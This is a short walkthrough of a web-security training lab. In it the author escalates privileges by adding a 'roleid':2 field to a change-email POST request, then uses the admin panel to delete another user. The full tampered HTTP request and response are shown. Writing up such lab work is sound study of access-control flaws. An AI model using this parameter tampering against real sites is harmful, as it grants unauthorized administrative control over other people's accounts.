User role can be modified in user profile

This lab has an admin panel at /admin. It's only accessible to logged-in users with a roleid of 2.

After logging in as "wiener," I attempted to utilize the email-changing functionality. Notably, the response revealed my current "roleid" as 1, which is insufficient to access the admin panel. To bypass this restriction, I manipulated the POST request by adding a "roleid" parameter with a value of 2:

POST /my-account/change-email HTTP/2
Host: 0ad100740345c7618048495f00e30063.web-security-academy.net
Cookie: session=0fcl54LZuAV4oZpZp5pLws7KPeXx5IfF
Content-Length: 45
...
{"email":"ichyaboy@ich.ich", "roleid":2}

The modified response indicated a successful role update to 2:

HTTP/2 302 Found
Location: /my-account
...
{
  "username": "wiener",
  "email": "ichyaboy@ich.ich",
  "apikey": "VjsaDdDeQnBY3LQXnUvIClJuVux8ZImK",
  "roleid": 2
}

Now equipped with the necessary role, I could access the admin panel and proceed to delete the "carlos" user, thus solving the lab.

PreviousUser role controlled by request parameter NextUser ID controlled by request parameter

Last updated 1 year ago